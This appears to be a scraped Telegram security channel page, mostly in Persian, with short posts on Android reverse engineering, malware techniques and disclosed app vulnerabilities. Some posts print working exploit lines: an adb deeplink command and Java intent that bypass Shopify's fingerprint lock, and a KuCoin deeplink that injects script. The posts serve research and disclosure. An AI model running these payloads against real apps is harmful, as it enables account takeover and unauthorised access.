Security Analysis
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
⭕️ در این مقاله محقق امنیتی نحوه آنالیز داینامیک لایبرری Native توسط r2frida و در نهایت اوتومیشن کردن پروسه پچ کردن لایبرری در ران تایم توسط r2pipe را آموزش میدهد.
در این مقاله به صورت داینامیک در ران تایم فانکشن native که مربوط به چک کردن پسورد یک اپ crackMe هست را بایپس میکند.

لینک مقاله

لینک مقاله های مشابه

رفرنس رسمی اسکریپت نویسی توسط r2pipe
#Android #Reverse #r2frida #r2pipe
@Securation
⭕️ 3 روش برای بارگذاری داینامیک کد در اندروید

بارگذاری کد داینامیک در اندروید از روش‌هایی است که بدافزار ها برای پنهان کردن رفتار مخرب خود از دید آنتی ویروس ها استفاده می‌کنند.
در این مقاله محقق امنیتی 3 روش مختلف برای لود داینامیک کد ها مثال زده است
1️⃣DexClassLoader
2️⃣PathClassLoader
3️⃣InMemoryDexClassLoader

🔗 Blog Post |
Github

#Android #Malware
@Securation
⭕️ در این پست محقق امنیتی با توجه به پیاده سازی نا امن Content Provider یک اپ اندرویدی که به صورت Exported پیاده سازی شده و به سایر برنامه ها اجازه میدهد که آنرا فراخوانی نمایند؛ از طریق تعامل با content provider خارج از محیط برنامه توانسته است به محتوای فایل های Shared_Pref که حاوی اطلاعات حساس مانند توکن احراز هویت کاربر است دسترسی پیدا کرده و آنرا هایجک نماید و به Account Takeover منتهی شود.

Link

#Android #RE
@Securation
⭕️ تزریق کد در اندروید بدون نیاز به Ptrace

در این بلاگ پست با نحوه تزریق کتابخانه با استفاده از /proc/mem بدون نیاز به ptrace آشنا خواهید شد

این ابزار از پروژه Linux_injector ایده برداری شده و برای استفاده در اندروید port شده است

فرآیند تزریق شامل چند مرحله است:
اولین قدم این است که یک فانکشن را برای هایجک انتخاب کنید. همانطور که در پروژه اصلی اجرا شد، malloc یکی از رایج ترین اهداف است. آدرس malloc با خواندن /proc/maps، یافتن آدرس پایه libc و محاسبه آدرس مجازی فعلی malloc با افزودن افست آن به آدرس پایه پیدا می‌شود.

پس از یافتن آدرس، تابع هدف با شل کد مرحله اول بازنویسی می شود. شل کد وظیفه ایجاد یک Memory Region جدید، همگام سازی Thread ها و در نهایت اجرای شل کد مرحله دوم را بر عهده دارد.

شل کد مرحله دوم می تواند یکی از سه نوع باشد: shellcode loader، shellcode raw-dlopen که از dlopen برای بارگذاری یک کتابخانه مشترک از filesystem استفاده می کند، یا شل کد memfd-dlopen که dlopen را روی فایل memfd با محتویات ارائه شده توسط کاربر فراخوانی می کند.


Blog Post: Link
GitHub: Link

#Android #Ptrace
@securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️Bypass of biometrics security functionality (FingerPrint) of Shopify using DeepLink

Exploit using ADB:
adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'

Exploit using Java Code:
Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products"));
startActivity(intent);

https://hackerone.com/reports/637194

#Android
@Securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Android Malware with Fake Extension(PDF) in Whatsapp

در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.

#Android #Malware
@Securation
⭕️ APKscan

ابزاری برای اسکن و یافتن API Keys، Tokens، Credentials، Secrets، Endpoints و....

قابلیت ها:
پیدا کردن Secret ها در سورس برنامه
شناسایی مکان های حساس در سورس کد برنامه
شناسایی و یافتن Endpoint ها و توکن ها

https://github.com/LucasFaudman/apkscan
#Android
@Securation
⭕️ Android Native code obfuscation using O-LLVM(Control Flow Flattening)

Blog Post | o-llvm binary | o-llvm

#Android
#ollvm
#darvincisec
@Securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Exploiting the EvilVideo vulnerability on Telegram

یک اکسپلویت زیرودی تلگرام برای اندروید کشف شد که امکان ارسال برنامه‌های مخرب پنهان‌شده به صورت ویدیو در صفحه چت تلگرام قربانی را فراهم می‌کند و با ضربه زدن بر روی ویدیو به جای پخش مدیا، فرایند نصب بدافزار آغاز میشود

📎 Blog Post

#Android
@Securation
⭕️ چند بلاگ پست خوب در رابطه با نحوه دیباگ داینامیک لایبرری Native اپ های اندرویدی توسط IDA ، GDB و JEB

📎 Blog1 | Blog2 | Blog3 | Blog4

#Android #RE #GDB #IDA #JEB
@Securation
Media is too big
VIEW IN TELEGRAM
⭕️ RCE on Xiaomi 13 Pro (CVE-2023-26324)

👉Exploitation:
1) Open URL in WebView
2) Inject JavaScript
3) Execute JavaScript Interface functions from vulnerable GetApps to install & launch payload
4) Get shell

📎 Slides with PoC: DL-Link

#Android
@Securation
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین

در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد

adb shell am start   -d 'kucoin:///link?data=\<script\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</script\>'

📎 BlogPost

@Securation
#Android
Media is too big
VIEW IN TELEGRAM
⭕️ حل چالش مهندسی معکوس اپلیکیشن اندروید با موبایل.
چالش Milad Tower در مسابقات Olympics CTF

#Reverse #Android #CTF
#OlympicCTF
@Securation
⭕️ Exploiting Deeplink via XSS Lead To ATO in South Korea's biggest mobile chat app

رایت اپ One Click Exploit XSS To ATO  و نحوه اکسپلویت شدن نرم افزار مسنجر اندرویدی kakaoTalk کره جنوبی که امکان سرقت Access  Token و استخراج همه ی گفتگوها را برای هکر فراهم میکند.
باگ موجود برطرف شده است، اما گزارشگر باگ پاداشی دریافت نکرده است، چرا که فقط کره ای ها واجد شرایط دریافت جایزه هستند!!!

📎 BlogPost: Link


@Securation
#Android #DeepLink #XSS #ATO
⭕️Exploring Native Functions with Frida on Android

📎 BlogPost: Part1 | Part2 | Part3 | Part4

@Securation
#Android #Frida
⭕️ PairIP Protection Remover

یک ابزار ساده و چند پلتفرمی برای دور زدن پروتکشن PairIP گوگل در برنامه‌های Flutter می باشد که در هر دو نسخه پایتون و بش موجود است.

📎 GitHub

@Securation
#Android #RE #Pairip #Flutter
⭕️ FridaScriptGen

این برنامه کد Smali یک APK را برای شناسایی ریشه و الگوهای SSL-pinning اسکن می‌کند و سپس به طور خودکار اسکریپت‌های Frida را برای دور زدن این بررسی‌های امنیتی ایجاد می‌کند.

📎 GitHub

@Securation
#Android #Frida
1
⭕️ Frida Launcher 🚀

سرور Frida را به راحتی و تنها با یک لمس، روی دستگاه‌های اندروید و شبیه‌سازها مدیریت کنید!

📎 GitHub

@Securation
#Android #Frida
⭕️ ریکان اندروید برای باگ بانتی!

اگر به دنبال شکار باگ توی اپ‌های اندرویدی هستید، اولین قدم شناسایی دقیق اپ و کشف نقاط ضعفشه. توی این مسیر باید بلد باشید چطور:

⦁ کدها و منابع رو دیکامپایل کنی (APKTool و jadx-gui کمکت می‌کنند)
⦁ آدرس‌های مخفی و endpointها رو پیدا کنی (apk2url)
⦁ کلیدها و secrets های هاردکد شده رو کشف کنی
⦁ از ابزارهای اتومیت مثل MobSF برای آنالیز امنیتی استفاده کنی
⦁ با Drozer تست runtime انجام بدی و باگ‌های permission و... رو بگیری

این تکنیک‌ها و جزییاتش رو میتونید در بلاگ پست زیر مطالعه کنید
📎 Blog: Link

@Securation
#Android #Recon #RE
13👍5👎1